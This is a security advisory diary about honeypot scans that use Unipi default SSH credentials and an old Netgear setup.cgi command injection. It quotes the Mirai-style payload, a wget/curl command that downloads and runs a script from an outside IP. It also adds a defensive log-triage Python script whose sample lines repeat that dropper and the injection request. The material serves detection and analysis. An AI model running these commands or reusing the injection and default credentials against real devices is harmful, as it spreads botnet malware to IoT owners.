It Is 2025, And We Are Still Dealing With Default IoT Passwords And Stupid 2013 Router Vulnerabilities

    Published: 2025-05-12. Last Updated: 2025-05-12 13:49:21 UTC
    by Johannes Ullrich (Version: 1)

    Unipi Technologies develops programmable logic controllers for applications such as home automation, building management, and industrial control. Its modules are aimed at a more professional audience than typical consumer smart-home gear. All of them run the "Marvis" platform, a customized Linux distribution maintained by Unipi.

    Over the last couple of days, we observed scans in our honeypot logs using the Unipi default username and password ("unipi" and "unipi.technology"). The scans originate from 176.65.148.10, an IP address that is already well known in our database.

    In addition to the SSH login attempts, the same IP address also probes for an ancient Netgear vulnerability from 2013, which only received a CVE identifier last year (CVE-2024-12847).

    Both the SSH sessions and the "Netgear" exploit attempts execute the same command string:

    cd /tmp; rm -rf wget.sh curl.sh; wget http://213.209.143.44/ssh.sh; chmod +x ssh.sh; sh ssh.sh;curl -o http://213.209.143.44/ssh.sh; chmod +x ssh.sh; sh ssh.sh

    which kicks off the standard Mirai/Gafgyt install chain: change into a writable directory, remove leftovers from earlier runs, fetch a stager script, mark it executable, and run it. Note that the curl fallback in this payload is malformed: the "-o" option consumes the URL as the output filename, so curl is left with no URL and exits without fetching anything. On a device that has no wget, the chain simply fails.
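    As an added example (not part of the original diary, and not Unipi's or the honeypot's own code), the following Python script shows how a practitioner could triage honeypot logs for exactly the three things described above: the Unipi default credentials, the 2013 Netgear setup.cgi command-injection request shape that CVE-2024-12847 covers, and the wget/curl/chmod/sh dropper chain, including the broken curl fallback. The log line format and the sample lines are constructed for this example; the setup.cgi "todo=syscmd&cmd=" request shape is assumed here as the form the old Netgear exploit takes in a web log. The IP addresses are the ones from the diary.

```python
import json
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample log lines (not real honeypot data). The format is an
# assumption made for this example:
#   SSH:  "<ts> ssh <src_ip> login user=<u> pass=<p> cmd=<command>"
#   HTTP: "<ts> http <src_ip> <METHOD> <path> body=<command>"
SAMPLE_LOGS = [
    "2025-05-11T02:14:07Z ssh 176.65.148.10 login user=unipi pass=unipi.technology "
    "cmd=cd /tmp; rm -rf wget.sh curl.sh; wget http://213.209.143.44/ssh.sh; chmod +x ssh.sh; sh ssh.sh;"
    "curl -o http://213.209.143.44/ssh.sh; chmod +x ssh.sh; sh ssh.sh",
    "2025-05-11T02:14:09Z http 176.65.148.10 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd"
    "&cmd=cd+%2Ftmp%3B+wget+http%3A%2F%2F213.209.143.44%2Fssh.sh%3B+sh+ssh.sh&curpath=%2F&currentsetting.htm=1 body=",
    "2025-05-11T02:15:00Z ssh 203.0.113.7 login user=root pass=toor cmd=uname -a",
    "2025-05-11T02:16:30Z http 203.0.113.7 GET /index.html body=",
]

SSH_RE = re.compile(r"^(?P<ts>\S+) ssh (?P<ip>\S+) login user=(?P<user>\S+) pass=(?P<pw>\S+) cmd=(?P<cmd>.*)$")
HTTP_RE = re.compile(r"^(?P<ts>\S+) http (?P<ip>\S+) (?P<method>\S+) (?P<path>\S+) body=(?P<body>.*)$")

# Vendor default credentials the diary reports being scanned for.
DEFAULT_CREDS = {("unipi", "unipi.technology")}
# Download tool followed (anywhere later) by chmod +x or "sh something.sh".
DROPPER_RE = re.compile(r"\b(wget|curl|tftp)\b.*\b(chmod\s+\+x|sh\s+\S+\.sh)")
URL_RE = re.compile(r"https?://[^\s;'\"]+")


def parse_line(line):
    """Turn one raw log line into an event dict, or None if it is not recognized."""
    for kind, rx in (("ssh", SSH_RE), ("http", HTTP_RE)):
        m = rx.match(line)
        if m:
            return {"kind": kind, **m.groupdict()}
    return None


def curl_fallback_broken(cmd):
    """True if a curl segment lets '-o' eat the only URL, so curl has nothing to fetch."""
    for segment in cmd.split(";"):
        tokens = segment.split()
        if not tokens or tokens[0] != "curl":
            continue
        urls, i = [], 1
        while i < len(tokens):
            if tokens[i] in ("-o", "--output"):
                i += 2  # -o consumes the next token as the output filename
                continue
            if tokens[i].startswith(("http://", "https://")):
                urls.append(tokens[i])
            i += 1
        if not urls:
            return True
    return False


def analyze(event):
    """Tag one event and pull out any dropper URLs it carries."""
    tags, cmd = [], ""
    if event["kind"] == "ssh":
        if (event["user"], event["pw"]) in DEFAULT_CREDS:
            tags.append("unipi_default_creds")
        cmd = event["cmd"]
    else:
        parts = urlsplit(event["path"])
        qs = parse_qs(parts.query)
        # Assumed shape of the 2013 Netgear setup.cgi command injection (CVE-2024-12847).
        if parts.path.endswith("/setup.cgi") and qs.get("todo") == ["syscmd"] and "cmd" in qs:
            tags.append("netgear_setup_cgi_syscmd")
            cmd = qs["cmd"][0]  # parse_qs already URL-decodes the injected command
        else:
            cmd = event["body"]
    urls = set()
    if cmd and DROPPER_RE.search(cmd):
        tags.append("mirai_style_dropper")
        urls.update(URL_RE.findall(cmd))
        if curl_fallback_broken(cmd):
            tags.append("curl_fallback_malformed")
    return {"ip": event["ip"], "tags": tags, "urls": sorted(urls), "cmd": cmd}


def scan(lines):
    """Aggregate findings per source IP; IPs with no findings are omitted."""
    report = {}
    for line in lines:
        event = parse_line(line)
        if event is None:
            continue
        result = analyze(event)
        if not result["tags"]:
            continue
        entry = report.setdefault(result["ip"], {"tags": set(), "urls": set()})
        entry["tags"].update(result["tags"])
        entry["urls"].update(result["urls"])
    return {ip: {"tags": sorted(v["tags"]), "urls": sorted(v["urls"])} for ip, v in report.items()}


if __name__ == "__main__":
    print(json.dumps(scan(SAMPLE_LOGS), indent=2))
```

    Run against the constructed sample, only 176.65.148.10 is reported, carrying all four tags and the single download URL; the root/toor login and the plain GET on /index.html produce no findings. The extracted URL list is what you would feed into a blocklist or a sandbox fetch, and the "curl_fallback_malformed" tag records the detail that the curl branch of the payload can never succeed.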


    ---
    Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
